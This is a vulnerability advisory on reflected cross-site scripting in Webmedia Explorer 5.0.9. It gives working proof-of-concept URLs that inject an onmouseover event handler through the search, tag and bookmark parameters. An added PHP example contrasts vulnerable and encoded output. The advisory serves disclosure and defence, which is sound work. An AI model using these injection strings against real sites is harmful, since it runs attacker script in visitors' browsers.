Webmedia Explorer - Cross Site Scripting Vulnerability
Version Affected: 5.0.9 (newest is: 5.10.0)
Info: Webmedia Explorer is an alternative CMS engine that reads the hard disc and generates a website in real time, taking advantage of a very powerful rendering and data fetching caching system.
-:: The Advisory ::-
Vulnerable Function / ID Calls:
search, tag, bookmark & "another function that registers all extra calls"
Cross Site Scripting: (by using event handlers)
http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over the search field.
http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over a tag.
http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > ---
-- Will be executed when a user moves his mouse over the column field. (unlikely)
http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
-- Requires admin access; however, since this is a hidden tag, exploitation is highly unlikely.
POST Method - Cross Site Scripting:
(the following was sent: " onmouseover=alert(0) > --- )
-:: Solution ::-
Filtering event handlers should do the trick.
A pretty secure system overall, nice to see.
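Added example (not part of the original advisory and not Webmedia Explorer's code): every URL above starts its payload with a double quote to close an HTML attribute, so encoding the value for the attribute context on output removes the breakout regardless of which event handler is used. The function names are hypothetical, and the example assumes the search value is echoed into a double-quoted value attribute, which the advisory implies but does not show.

```php
<?php
// Added example; function names are hypothetical, not Webmedia Explorer code.

// Vulnerable pattern: the request value is concatenated into a quoted attribute,
// so a double quote in the value closes the attribute early.
function render_search_unsafe(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both " and ', so single-quoted attributes are safe too.
function render_search_safe(string $search): string
{
    $encoded = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="search" value="' . $encoded . '">';
}

// Regression check: parse the markup and list every attribute on the <input>
// that the template did not intend to emit.
function unexpected_attributes(string $html): array
{
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $input = $doc->getElementsByTagName('input')->item(0);
    $found = [];
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            if (!in_array($attr->name, ['type', 'name', 'value'], true)) {
                $found[] = $attr->name;
            }
        }
    }
    return $found;
}

// Value taken from the advisory's ?search= URL.
$payload = '" onmouseover=alert(0) ---';

foreach (['render_search_unsafe', 'render_search_safe'] as $render) {
    $html = $render($payload);
    echo $render, ': ', $html, PHP_EOL;
    echo '  unexpected attributes: ',
        json_encode(unexpected_attributes($html)), PHP_EOL;
}
```

The same check can be run in a test suite against each template that writes the tag, bookmark or unrecognised parameter values into an attribute.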
- Vulnerabilities found, researched and confirmed between the 5th and 10th of June.
- Advisory finished and published on InterN0T on the 12th of June.
- Vendor and Bugtraq (SecurityFocus) contacted on the 12th of June.
All of the best,